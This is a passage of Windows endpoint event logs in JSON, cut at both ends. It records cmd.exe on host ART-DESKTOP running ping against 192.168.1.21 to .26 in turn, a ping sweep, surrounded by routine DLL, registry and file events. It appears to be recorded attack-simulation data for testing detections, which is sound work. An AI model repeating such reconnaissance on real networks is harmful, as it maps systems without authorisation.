- "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime\\SecureTimeConfidence", - "registry_value": "SecureTimeConfidence", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "process", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572086830000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.21", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6828, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "process", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572091990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.22", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4740, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "registry", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\SettingsRequests", - "registry_value": "SettingsRequests", - "timestamp": 131883572094330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "registry", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\SettingsRequests", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\SettingsRequests\\LastDownloadTime", - "registry_value": "LastDownloadTime", - "timestamp": 131883572094330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "file", - "file_name": "e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", - "file_path": "C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "timestamp": 131883572094330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "file", - "file_name": "e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", - "file_path": "C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "timestamp": 131883572094330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "process", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572096830000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.23", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5812, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572096980000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "process", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572101840000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.24", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7672, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572101980000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "process", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572106830000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.25", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7552, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\BITS", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\BITS\\Start", - "registry_value": "Start", - "timestamp": 131883572107770000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_value": "BITS", - "timestamp": 131883572108080000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS\\PerfMMFileName", - "registry_value": "PerfMMFileName", - "timestamp": 131883572108080000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "process", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "subtype": "terminate", - "timestamp": 131883572108080000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "process", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572111840000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.26", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6840, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572111980000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": 